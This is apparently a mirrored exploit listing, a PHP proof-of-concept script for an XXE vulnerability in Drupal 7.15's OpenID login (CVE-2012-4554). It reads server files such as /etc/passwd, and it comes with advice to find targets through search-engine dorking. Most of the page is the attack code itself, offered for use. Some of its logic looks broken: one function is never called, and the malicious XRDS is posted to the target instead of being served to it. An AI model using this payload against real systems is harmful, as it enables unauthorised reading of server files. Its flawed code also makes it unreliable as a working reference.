Share
## https://sploitus.com/exploit?id=PACKETSTORM:189779
=============================================================================================================================================
| # Title : Drupal 7.15 via OpenID XXE vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://new.drupal.org/home |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: XXE vulnerability in Drupal via OpenID
(Related : https://packetstorm.news/files/id/180671/ Linked CVE numbers: CVE-2012-4554 ) .
[+] save code as poc.php.
[+] Set target : line 66
[+] PayLoad :
<?php
/**
* استغلال ثغرة XXE في دروبال عبر OpenID
*/
function send_openid_auth($target_uri, $identifier) {
$url = rtrim($target_uri, '/') . "/?q=node&destination=node";
$post_data = http_build_query([
"openid_identifier" => $identifier,
"name" => "",
"pass" => "",
"form_id" => "user_login_block",
"op" => "Log in"
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
function generate_xrds($file_path) {
// تصحيح المتغيرات بتحديد قيم صحيحة
$xrds_ns = "xri://example.com/xrds";
$xrd_ns = "xri://example.com/xrd";
$v = "2.0";
$xml = "<?xml version='1.0' encoding='UTF-8'?>";
$xml .= "<!DOCTYPE foo [ <!ELEMENT URI ANY> <!ENTITY xxe SYSTEM 'file://$file_path'> ]>";
$xml .= "<xrds:XRDS xmlns:xrds='$xrds_ns' xmlns='$xrd_ns*($v)' xmlns:openid='http://openid.net/xmlns/1.0'>";
$xml .= "<XRD><Service><Type>http://specs.openid.net/auth/2.0/signon</Type>";
$xml .= "<URI>&xxe;</URI></Service></XRD></xrds:XRDS>";
return $xml;
}
function exploit_xxe($target_uri, $file_path) {
$xrds_data = generate_xrds($file_path);
$xrds_url = rtrim($target_uri, '/') . "/malicious.xrds";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $xrds_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xrds_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/xrds+xml']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (strpos($response, "<URI>") !== false) {
preg_match('/<URI>(.*?)<\/URI>/', $response, $matches);
return isset($matches[1]) ? $matches[1] : "File content not found.";
}
return "Exploit failed or file not readable.";
}
$target = "http://example.com/drupal";
$file_to_read = "/etc/passwd";
$result = exploit_xxe($target, $file_to_read);
echo "Extracted File Content:\n" . $result;
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================